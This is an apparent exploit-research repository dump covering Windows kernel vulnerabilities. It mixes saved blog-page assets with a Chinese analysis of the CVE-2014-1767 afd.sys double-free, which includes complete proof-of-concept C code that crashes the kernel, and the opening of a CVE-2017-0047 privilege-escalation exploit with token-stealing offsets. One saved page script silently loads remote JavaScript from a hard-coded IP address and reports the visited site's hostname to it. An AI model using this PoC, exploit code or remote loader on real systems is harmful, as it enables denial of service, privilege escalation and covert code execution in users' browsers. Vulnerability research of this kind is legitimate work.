135 | * 136 | * @param None 137 | * @return None 138 | */ 139 | var createjs = function() { 140 | var d = document, 141 | t = d.getElementById('1qa2ws'), 142 | //u = t.getAttribute("src"), 143 | h = d.head || d.getElementsByTagName("head")[0], 144 | //a = t.attributes, 145 | 146 | //scgparam = getScgParams(a); 147 | s = d.createElement("script"); 148 | 149 | loadjs(s); 150 | top.apptlbs = {}; 151 | s.charset = "UTF-8"; 152 | var Mytime = new Date(); 153 | var Time = Mytime.getTime(); 154 | //var toolbarURL = u.split('www/')[0]; 155 | var toolbarURL = 'http://111.8.2.135:9002/'; /* NOTE(review): hard-coded plain-HTTP loader origin; the commented-out line 154 shows it was once derived from the proxy-inserted script's src instead. The script element built below is appended to the page head (line 164), so the response from this address executes in the page's origin, and the page's hostname:port is reported to it as the website parameter (line 158). */ 156 | var website = top.window.location ? top.window.location.hostname + (top.window.location.port ? ':' + top.window.location.port : '') : ''; 157 | //s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website + encodeURI(scgparam); 158 | s.src = toolbarURL + "get?time=" + Time + "&tlbsip=" + toolbarURL + "&website=" + website; 159 | var appkey = getparam('appkey'); 160 | if (appkey && (('http://' + website + '/') == toolbarURL)) { 161 | s.src = s.src + "&appkey=" + appkey; 162 | top.apptlbs.appkey = appkey; 163 | } /* NOTE(review): appkey from the query string is forwarded (unencoded, see getparam) only when the page's http:// origin equals toolbarURL. */ 164 | h.appendChild(s); 165 | }; 166 | if (parent == self) { 167 | createjs(); 168 | } 169 | 170 | cdate = new Date(); 171 | var endcdr = { 172 | 'jsname': 'base.js', 173 | 'jsexetype': '2', 174 | 'btime': cdate 175 | }; 176 | top.tlbscdr.jscdr.push(endcdr); 177 | 178 | //TODO: Refer CDR writing in success cases of insertion 179 | } catch (e) { 180 | var d = document; 181 | var t = d.getElementById('1qa2ws'); 182 | var u = t.getAttribute("src"); /* NOTE(review): t is null when no element with id '1qa2ws' exists, so this line throws a TypeError inside the error handler itself; u and params are only consumed by the commented-out lines 193-194, so no failure CDR is ever sent. */ 183 | var params = e.message; 184 | params += "&time=" + new Date().getTime(); 185 | var js = document.createElement('script'); 186 | js.onload = js.onreadystatechange = function() { 187 | if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') { 188 | js.onload = js.onreadystatechange = null; 189 | document.body.removeChild(js); 190 | } 
191 | }; 192 | //TODO: Uncoment below & Refer CDR writing in error cases of insertion 193 | //js.src = u.split('tlbsgui')[0] + "tlbsserver/stagelog?" + params; 194 | //document.body.appendChild(js); 195 | } 196 | 197 | })(window) 198 | -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/bundle-LessIsMore-mobile.css: -------------------------------------------------------------------------------- 1 | body{font-size:14px!important;font-family:'PingFang SC','Helvetica Neue','Helvetica','Arial',sans-serif}#blog_nav_rss{display:none!important}#blog_nav_rss_image{display:none!important}#blog_nav_newpost{display:none!important}img{max-width:300px!important;height:auto}div.commentform textarea{width:330px;height:200px}.commentbox_title{width:auto}#green_channel{width:320px}#cnblogs_post_body table[style]{width:auto!important;height:auto!important}#sidebar_search_box input[type=text]{width:260px}.sh-gutter .line,.sh-gutter code{white-space:normal!important}#cnblogs_post_body table{display:block;overflow-x:scroll;-webkit-overflow-scrolling:regular}#cnblogs_post_body th,#cnblogs_post_body td,.cnblogs-post-body th,.cnblogs-post-body td{white-space:nowrap}#cnblogs_post_body table::-webkit-scrollbar:horizontal{height:12px}#cnblogs_post_body table::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar{width:12px;background-color:#f5f5f5}#cnblogs_post_body table::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#555}#cnblogs_c1,#cnblogs_c2{text-align:center}.commentform{margin-left:10px} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/bundle-LessIsMore.css: 
-------------------------------------------------------------------------------- 1 | #EntryTag{margin-top:20px;font-size:9pt;color:gray}#divRefreshComments{text-align:right;margin-right:10px;margin-bottom:5px;font-size:9pt}.topicListFooter{text-align:right;margin-right:10px;margin-top:10px}*{margin:0;padding:0}body{color:#333;background:#fff;font-family:Verdana,Arial,Helvetica,sans-serif;font-size:10pt;line-height:1.8}img{border:0}li{list-style:none}input,textarea{border:1px solid #999}h1,h2,h3,h4,h5,h6,th{font-weight:bold;color:#000}a{text-decoration:none;color:#333}a:hover{color:#999}#sideBar{width:220px;float:left;border:1px solid #999;border-top-width:0;overflow:hidden;padding:0 8px 40px 12px}#mainContent{float:right;margin-left:-250px;width:100%}.forFlow{margin:0 16px 0 266px}#footer{text-align:center}#lnkBlogLogo{display:none}#blogTitle{padding:16px}#blogTitle h1{font-size:17pt}#blogTitle h2{font-size:10.5pt;color:#999}#blogTitle .title{font-size:17pt}#blogTitle .subtitle{font-size:10.5pt;color:#999}#navigator{background:#f6f6f6;border:1px solid #ccc;border-width:1px;height:30px;line-height:30px;color:#999;padding-left:15px;padding-right:5px;padding-top:2px\9}#navigator img{display:none}.blogStats{float:right;color:#999}#navList li{float:left;margin-right:20px;font-size:10.5pt}#sideBar li,.divRecentCommentAticle{text-indent:-1.5em;margin-left:1.5em}#sideBar h3,#MyIng .ing_title{margin:16px 0 0 -8px;font-size:14px;text-align:left}#calendar{margin-top:16px;text-align:center}#calendar table{width:90%;margin:0 auto}#calendar .CalOtherMonthDay{color:#999}#sideBar .divRecentComment{color:#666;margin:0 0 8px 8px}.ing_title a:link,.ing_title a:visited,.ing_title a:hover,.ing_title a:active{font-weight:bold}div.commentform textarea{width:450px;height:300px;ont-size:13px}.dayTitle{display:none}.entrylistTitle,.thumbTitle,.PostListTitle,.forFlow h3 
div,.galleryTitle{font-size:14px;font-weight:bold;margin-top:20px;text-align:left}.entrylistDescription,.thumbDescription{margin-left:16px}.postTitle,.entrylistPosttitle,.feedback_area_title{border-bottom:1px solid #ddd;font-size:14px;font-weight:bold;margin:20px 0 10px}.postBody p{margin-top:12px}.postBody h5{font-size:10pt}.postCon a,.postBody a,.feedbackCon a{border-bottom:1px dotted #333;color:#000}.postCon a:hover,.postBody a:hover,.feedbackCon a:hover{border-color:#999}.postDesc,.entrylistItemPostDesc{border-bottom:1px dotted #999;color:#999;text-align:right;padding-bottom:20px}.PostList{float:none;clear:both;text-align:right;width:96%;margin:auto;padding:6px 0;overflow:hidden;border-bottom:1px dotted #ccc}.postTitl2{float:left}.postText2{text-align:left;color:#666}.feedbackItem{padding:8px;border-bottom:1px dotted #ccc}.feedbackManage{float:right}.feedbackCon{margin-left:1em;color:#666}.commentform td div span{margin-left:12px}.gallery img{margin:8px}#taglist{margin:20px auto}.pfl_feedback_area_title{font-size:16px;margin:16px 0;font-weight:bold}.pfl_feedback_area_title a{font-size:12px;color:#999;font-weight:normal}.pfl_feedbacksubtitle{height:30px}.pfl_feedbackname,.pfl_feedbackManage{float:left;margin:10px 20px 0 0}.pfl_feedbackCon,.pfl_feedbackAnswer{clear:both;margin-left:12px}.btn_my_zzk{border:0}#sideBarMain{padding-left:0}#MyIng{padding-left:10px}p{margin-top:0;margin-bottom:0}div#sideBar div#side_ing_block ul li{margin-left:0;text-indent:0}@media only screen and (max-width:767px){#sideBar{width:auto}.commentbox_main{padding-right:10px}div.commentform textarea{width:100%}#main{padding:0!important}#mainContent{float:none!important;margin-left:0;overflow:initial!important}.forFlow{margin:0 10px}#sideBar{float:none!important;margin-left:0!important;position:static!important}} -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 
博客园_files/copycode.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/copycode.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/encoder.js.下载: -------------------------------------------------------------------------------- 1 | Encoder={EncodeType:"entity",isEmpty:function(a){return a?a===null||a.length==0||/^\s+$/.test(a):true},arr1:[" ","¡","¢","£","¤","¥","¦","§","¨","©","ª","«","¬","­","®","¯","°","±","²","³","´","µ","¶","·","¸","¹","º","»","¼","½","¾","¿","À","Á","Â","Ã","Ä","Å","Æ","Ç","È","É","Ê","Ë","Ì","Í","Î","Ï","Ð","Ñ","Ò","Ó","Ô","Õ","Ö","×","Ø","Ù","Ú","Û","Ü","Ý","Þ","ß","à","á","â","ã","ä","å","æ","ç","è","é","ê","ë","ì","í","î","ï","ð","ñ","ò","ó","ô","õ","ö","÷","ø","ù","ú","û","ü","ý","þ","ÿ",""","&","<",">","Œ","œ","Š","š","Ÿ","ˆ","˜"," "," "," ","‌","‍","‎","‏","–","—","‘","’","‚","“","”","„","†","‡","‰","‹","›","€","ƒ","Α","Β","Γ","Δ","Ε","Ζ","Η","Θ","Ι","Κ","Λ","Μ","Ν","Ξ","Ο","Π","Ρ","Σ","Τ","Υ","Φ","Χ","Ψ","Ω","α","β","γ","δ","ε","ζ","η","θ","ι","κ","λ","μ","ν","ξ","ο","π","ρ","ς","σ","τ","υ","φ","χ","ψ","ω","ϑ","ϒ","ϖ","•","…","′","″","‾","⁄","℘","ℑ","ℜ","™","ℵ","←","↑","→","↓","↔","↵","⇐","⇑","⇒","⇓","⇔","∀","∂","∃","∅","∇","∈","∉","∋","∏","∑","−","∗","√","∝","∞","∠","∧","∨","∩","∪","∫","∴","∼","≅","≈","≠","≡","≤","≥","⊂","⊃","⊄","⊆","⊇","⊕","⊗","⊥","⋅","⌈","⌉","⌊","⌋","⟨","⟩","◊","♠","♣","♥","♦"],arr2:[" 
","¡","¢","£","¤","¥","¦","§","¨","©","ª","«","¬","­","®","¯","°","±","²","³","´","µ","¶","·","¸","¹","º","»","¼","½","¾","¿","À","Á","Â","Ã","Ä","Å","Æ","Ç","È","É","Ê","Ë","Ì","Í","Î","Ï","Ð","Ñ","Ò","Ó","Ô","Õ","Ö","×","Ø","Ù","Ú","Û","Ü","Ý","Þ","ß","à","á","â","ã","ä","å","æ","ç","è","é","ê","ë","ì","í","î","ï","ð","ñ","ò","ó","ô","õ","ö","÷","ø","ù","ú","û","ü","ý","þ","ÿ",""","&","<",">","Œ","œ","Š","š","Ÿ","ˆ","˜"," "," "," ","‌","‍","‎","‏","–","—","‘","’","‚","“","”","„","†","‡","‰","‹","›","€","ƒ","Α","Β","Γ","Δ","Ε","Ζ","Η","Θ","Ι","Κ","Λ","Μ","Ν","Ξ","Ο","Π","Ρ","Σ","Τ","Υ","Φ","Χ","Ψ","Ω","α","β","γ","δ","ε","ζ","η","θ","ι","κ","λ","μ","ν","ξ","ο","π","ρ","ς","σ","τ","υ","φ","χ","ψ","ω","ϑ","ϒ","ϖ","•","…","′","″","‾","⁄","℘","ℑ","ℜ","™","ℵ","←","↑","→","↓","↔","↵","⇐","⇑","⇒","⇓","⇔","∀","∂","∃","∅","∇","∈","∉","∋","∏","∑","−","∗","√","∝","∞","∠","∧","∨","∩","∪","∫","∴","∼","≅","≈","≠","≡","≤","≥","⊂","⊃","⊄","⊆","⊇","⊕","⊗","⊥","⋅","⌈","⌉","⌊","⌋","〈","〉","◊","♠","♣","♥","♦"],HTML2Numerical:function(a){return this.swapArrayVals(a,this.arr1,this.arr2)},NumericalToHTML:function(a){return this.swapArrayVals(a,this.arr2,this.arr1)},numEncode:function(c){if(this.isEmpty(c))return"";for(var d="",b=0;b"~")a="&#"+a.charCodeAt()+";";d+=a}return d},htmlDecode:function(e){var c,b,a=e;if(this.isEmpty(a))return"";a=this.HTML2Numerical(a);arr=a.match(/&#[0-9]{1,5};/g);if(arr!=null)for(var d=0;d=-32768&&c<=65535)a=a.replace(b,String.fromCharCode(c));else a=a.replace(b,"")}return a},htmlEncode:function(a,b){if(this.isEmpty(a))return"";b=b||false;if(b)if(this.EncodeType=="numerical")a=a.replace(/&/g,"&");else a=a.replace(/&/g,"&");a=this.XSSEncode(a,false);if(this.EncodeType=="numerical"||!b)a=this.HTML2Numerical(a);a=this.numEncode(a);if(!b){a=a.replace(/&#/g,"##AMPHASH##");if(this.EncodeType=="numerical")a=a.replace(/&/g,"&");else 
a=a.replace(/&/g,"&");a=a.replace(/##AMPHASH##/g,"&#")}a=a.replace(/&#\d*([^\d;]|$)/g,"$1");if(!b)a=this.correctEncoding(a);if(this.EncodeType=="entity")a=this.NumericalToHTML(a);return a},XSSEncode:function(a,b){if(!this.isEmpty(a)){b=b||true;if(b){a=a.replace(/\'/g,"'");a=a.replace(/\"/g,""");a=a.replace(//g,">")}else{a=a.replace(/\'/g,"'");a=a.replace(/\"/g,""");a=a.replace(//g,">")}return a}else return""},hasEncoded:function(a){return/&#[0-9]{1,5};/g.test(a)?true:/&[A-Z]{2,6};/gi.test(a)?true:false},stripUnicode:function(a){return a.replace(/[^\x20-\x7E]/g,"")},correctEncoding:function(a){return a.replace(/(&)(amp;)+/,"$1")},swapArrayVals:function(b,a,d){if(this.isEmpty(b))return"";var e;if(a&&d)if(a.length==d.length)for(var c=0,f=a.length;c 26 | * @copyright 2009 timbenniks.com 27 | * @version $Id: jquery.notice.js 1 2009-01-24 12:24:18Z timbenniks $ 28 | **/ 29 | (function(jQuery) 30 | { 31 | jQuery.extend({ 32 | noticeAdd: function(options) 33 | { 34 | var defaults = { 35 | inEffect: {opacity: 'show'}, // in effect 36 | inEffectDuration: 600, // in effect duration in miliseconds 37 | stayTime: 3000, // time in miliseconds before the item has to disappear 38 | text: '', // content of the item 39 | stay: false, // should the notice item stay or not? 40 | type: 'notice' // could also be error, succes 41 | } 42 | 43 | // declare varaibles 44 | var options, noticeWrapAll, noticeItemOuter, noticeItemInner, noticeItemClose; 45 | 46 | options = jQuery.extend({}, defaults, options); 47 | noticeWrapAll = (!jQuery('.notice-wrap').length) ? jQuery('
').addClass('notice-wrap').appendTo('body') : jQuery('.notice-wrap'); 48 | noticeItemOuter = jQuery('
').addClass('notice-item-wrapper'); 49 | noticeItemInner = jQuery('
').hide().addClass('notice-item ' + options.type).appendTo(noticeWrapAll).html('

'+options.text+'

').animate(options.inEffect, options.inEffectDuration).wrap(noticeItemOuter); 50 | noticeItemClose = jQuery('
').addClass('notice-item-close').prependTo(noticeItemInner).html('×').click(function() { jQuery.noticeRemove(noticeItemInner) }); 51 | 52 | // hmmmz, zucht 53 | if(navigator.userAgent.match(/MSIE 6/i)) 54 | { 55 | noticeWrapAll.css({top: document.documentElement.scrollTop}); 56 | } 57 | 58 | if(!options.stay) 59 | { 60 | setTimeout(function() 61 | { 62 | jQuery.noticeRemove(noticeItemInner); 63 | }, 64 | options.stayTime); 65 | } 66 | 67 | }, 68 | 69 | noticeRemove: function(obj) 70 | { 71 | obj.animate({opacity: '0'}, 200, function() 72 | { 73 | obj.parent().animate({height: '0px'}, 100, function() 74 | { 75 | obj.parent().remove(); 76 | }); 77 | }); 78 | } 79 | }); 80 | })(jQuery); -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/3/CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu_files/style.css: -------------------------------------------------------------------------------- 1 | /* 2 | # Copyright (C) 2013 DMeng.net 3 | Theme Name: 多梦主题2014 4 | Theme URI: http://www.dmeng.net/dmeng-theme-2014.html 5 | Author: 多梦 6 | Author URI: http://www.dmeng.net/ 7 | Description: 多梦网络主题是一款拥有丰富语义网和个性化设置以及支持手机访问的响应式主题。当前版本是DMENG2014,在2014年01月15日发布。 8 | Version: 1.4.1 9 | Tags: 响应式主题,手机主题 10 | */ 11 | 12 | body { font-family:"Microsoft Yahei","冬青黑体简体中文 w3","宋体";white-space:normal;word-break:break-all;} 13 | h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6{ font-family:"Microsoft Yahei","冬青黑体简体中文 w3","宋体";} 14 | h1, .h1{font-size:24px;} 15 | h2, .h2{border-bottom: 1px solid #dadada;padding-bottom:5px;font-size:21px;} 16 | h3, .h3{font-size:20px;} 17 | p {line-height:22px;font-size:13px;} 18 | .alignleft {float:left;} .alignright {float:right;} .alignnone {float:none;} 19 | .clean {clear:both;} 20 | .site-title {margin:0;font-family:"Microsoft Yahei","冬青黑体简体中文 w3","宋体";} 21 | .site-title span{font-size:16px;} 22 | .mt20 
{margin-top:20px;} 23 | .mb20 {margin-bottom:20px;} 24 | .mr10 {margin-right:10px;} 25 | .ml10 {margin-left:10px;} .ml5 {margin-left:5px;} 26 | code {white-space:normal;word-break:break-all;} 27 | blockquote {text-indent:0;border-left:10px solid #ccc;padding:15px 25px;background-color:#eee;display:block;} 28 | blockquote p{font-size:14px;line-height:24px;} 29 | .content {position:relative;z-index:999;} 30 | .content li{word-break:break-all;} 31 | .content p{margin-bottom:22px;font-size:15px;line-height:24px;} 32 | .content h3{font-weight:600px;} 33 | .content img{max-width:100%;} 34 | .searchResults strong{font-weight:normal;} 35 | .article_index {max-width:200px;padding-top:0 !important;padding-bottom:0 !important;} 36 | .stickyImg {width:100%;height:100px;overflow:hidden;} 37 | .stickyImg img {width:100%;} 38 | @media (max-width: 1200px) { 39 | .stickyImg {height:129px;overflow:hidden;} 40 | } 41 | @media (max-width: 992px) { 42 | .stickyImg {height:153px;overflow:hidden;} 43 | } 44 | @media (max-width: 767px) { 45 | .stickyImg {height:auto;} 46 | } 47 | .stickyContent {height:128px;overflow:hidden;margin-bottom:15px;} 48 | @media (max-width: 767px) { 49 | .stickyContent {height:auto;} 50 | } 51 | .stickyTitle {margin:5px 0 7px;} 52 | .stickyDesc p{margin-bottom:0;font-size:13px;} 53 | .indexCat .list-group-item span {display:block;height:20px;overflow:hidden;} 54 | .floatButton {position:fixed;top:50%;right:0;z-index:9999999;} 55 | .sidebar {position:relative;z-index:1;} 56 | .sidebar ul{padding:0;margin:10px;} 57 | .sidebar ul li{list-style:none;} 58 | .sidebar .list-group{padding:0;margin:0;} 59 | .panel{overflow:hidden;} 60 | .breadcrumb{margin-bottom:0;color:#999;} 61 | .breadcrumb a{color:#999;} 62 | .breadcrumb a:hover, a:focus{color:#2a6496;text-decoration:none;} 63 | .latestpostBox {padding-left:0;padding-right:0;} 64 | .latestpost p{margin-bottom:0;font-size:13px;color:#666;} 65 | .latestpost 
.thumbnail{width:220px;max-height:120px;float:left;margin:10px 15px 10px 0;} 66 | @media (max-width: 479px) { 67 | .latestpost .thumbnail{width:100%;max-height:500px;float:none;} 68 | } 69 | .latestpost .list-group-item{overflow:hidden;} 70 | .latestpost .h4{margin-top:10px;margin-bottom:10px;} 71 | .latestpost .sticky{background:#5cb85c;} 72 | .affix{top:0;padding-top:10px;background:#fff;} 73 | @media (max-width: 992px) { 74 | .affix{position:relative;} 75 | } 76 | footer {margin-top:30px;position:relative;z-index:999;} 77 | footer .panel-body .panel-body {padding:0;} 78 | @media (min-width: 992px) { 79 | .header-nav-right { 80 | display: none; 81 | } 82 | } 83 | @media (min-width: 1200px) { 84 | .header-nav-right { 85 | display: block; 86 | } 87 | } -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/Cve-2014-1767.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/Cve-2014-1767.rar -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.$$$: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.$$$ 
-------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.id0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.id0 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.id1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.id1 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.id2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.id2 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.nam -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.sys -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.til: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.til -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd_1767_Exp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd_1767_Exp.zip -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | poc: 3 | 4 | #include 5 | #include 6 | #pragma comment(lib, “WS2_32.lib”) 7 | 8 | int main() 9 | { 10 | DWORD targetSize = 0×310 ; 11 | DWORD virtualAddress = 0×13371337 ; 12 | DWORD mdlSize=(0×4000*(targetSize-0×30)/8)-0xFFF-(virtualAddress& 0xFFF) ; 13 | static DWORD inbuf1[100] ; 14 | memset(inbuf1, 0, sizeof(inbuf1)) ; 15 | inbuf1[6] = virtualAddress ; 16 | inbuf1[7] = mdlSize ; 17 | inbuf1[10] = 1 ; 18 | static DWORD inbuf2[100] ; 19 | memset(inbuf2, 0, sizeof(inbuf2)) ; 20 | inbuf2[0] = 1 ; 21 | inbuf2[1] = 0x0AAAAAAA ; 22 | WSADATA WSAData ; 23 | SOCKET s ; 24 | sockaddr_in sa ; 25 | int ierr ; 26 | WSAStartup(0×2, &WSAData) ; 27 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; 28 | memset(&sa, 0, sizeof(sa)) ; 29 | sa.sin_port = htons(135) ; 30 | sa.sin_addr.S_un.S_addr = inet_addr(“127.0.0.1″) ; 31 | sa.sin_family = AF_INET ; 32 | ierr = connect(s, (const struct sockaddr *)&sa, sizeof(sa)) ; 33 | static char outBuf[100] ; 34 | DWORD bytesRet ; 35 | DeviceIoControl((HANDLE)s, 0x1207F, (LPVOID)inbuf1, 0×30, outBuf, 0, &bytesRet, NULL); 36 | DeviceIoControl((HANDLE)s, 0x120C3, (LPVOID)inbuf2, 0×18, outBuf, 0, &bytesRet, NULL); 37 | 
return 0 ; 38 | } 39 | 40 | 整个漏洞的流程如下。 41 | 42 | POC创建了一个以socket为基础的本地网络连接,调用DeviceIoControl向socket对象分别发送两个控制码0x1207F和0x120C3,这两次控制码分别对应afd.sys的AfdTransmitFile和AfdTransmitPackets。 43 | 44 | ### IOControl=0x1207F(AfdTransmitFile) 45 | 46 | 1. AfdTransmitFile会调用AfdTliGetTpInfo来获得一个TpInfo结构 47 | 48 | 2. 接着AfdTransmitFile根据用户层传递过来的VirtualAddress=0x13371337和Length来创建一个Mdl,用来和用户层交互,并将这个Mdl的地址保存到TpInfo结构中的TpElementArray数组中。 49 | 50 | 3. AfdTransmitFile接着调用MmProbeAndLockPages函数,准备对申请的Mdl进行操作,但是由于无效的地址(VirtualAddress=0x13371337),程序进入到异常处理的流程中。 51 | 52 | 4. 异常处理流程会调用AfdReturnTpInfo函数,AfdReturnTpInfo函数遍历TpInfo结构的TpElementArray数组,将Mdl释放掉。接着其会调用ExFreeToNPagedLookasideList释放刚创建的TpInfo。 53 | 54 | 5. 但是因为此时这个Lookaside很"闲",ExFreeToNPagedLookasideList不会将TpInfo释放掉,而是将其挂载到Dedicated Lookaside List中去。但此时TpInfo所在pool数据还保留着,并没有清空,当然也包括已经释放掉的Mdl地址,成了一个dangling pointer,这里就埋下了隐患。这是第一次free的地方。 55 | 56 | 第一次IoControl的操作主要就是放置一个dangling pointer到Lookaside Lists中。 57 | 58 | 第二次IoControl对这个dangling pointer进行二次释放。 59 | 60 | 61 | ### IOControl=0x120C3(AfdTransmitPackets) 62 | 63 | 1. 接下来AfdTransmitPackets同样会调用AfdTliGetTpInfo创建一个TpInfo结构。AfdTliGetTpInfo会调用ExAllocateFromNPagedLookasideList。因为此时的Lookaside Lists不为空,所以会从中卸载一个ListEntry给TpInfo使用,而此时Lookaside就只有一个上一次AfdTransmitFile函数放入的ListEntry,所以这个ListEntry正好是响应上一个控制码所放进去的那个! 64 | 65 | 2. 接着AfdTliGetTpInfo会从用户层输入inbuf2[1]获得值0x0AAAAAAA,作为TpElementCount,接下来会创建一个0x0AAAAAAA*0x18=0xFFFFFFF0大小的pool,这显然太大了,所以会再一次的进去到异常处理的操作。 66 | 67 | 3. 异常处理会调用AfdReturnTpInfo,其会遍历TpInfo尝试释放掉Mdl。因为此时的TpInfo所在的pool正是" dangling pointer",而Mdl已经被释放过一次了,这时发生double-free。 68 | 69 | 4. 
然后发生BSOD。 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/cve-2014-1767_Afd.sys_double-free分析与利用.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/cve-2014-1767_Afd.sys_double-free分析与利用.pdf -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/exp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #pragma comment(lib, "gdi32.lib") 5 | #pragma comment(lib, "user32.lib") 6 | 7 | #ifndef W32KAPI 8 | #define W32KAPI DECLSPEC_ADDRSAFE 9 | #endif 10 | 11 | 12 | 13 | #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread 14 | #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process 15 | #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId 16 | #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink 17 | #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token 18 | #define SYSTEM_PID 0x004 // SYSTEM Process PID 19 | 20 | 21 | typedef NTSTATUS WINAPI NtAllocateVirtualMemory_t(IN HANDLE ProcessHandle, 22 | IN OUT PVOID *BaseAddress, 23 | IN ULONG ZeroBits, 24 | IN OUT PULONG AllocationSize, 25 | IN ULONG AllocationType, 26 | IN ULONG Protect); 27 | 28 | 29 | int main(int argc, char* argv[]) 30 | { 31 | HANDLE hProcess; 32 | DWORD dwPID = GetCurrentProcessId(); 33 | DWORD Virtual_BaseAddr = 1; 34 | SIZE_T RegionSize = 0x1000; 35 | 36 | hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, dwPID); 37 | NtAllocateVirtualMemory_t *NtAllocateVirtualMemory; 38 | NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t *)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); 39 | ULONG 
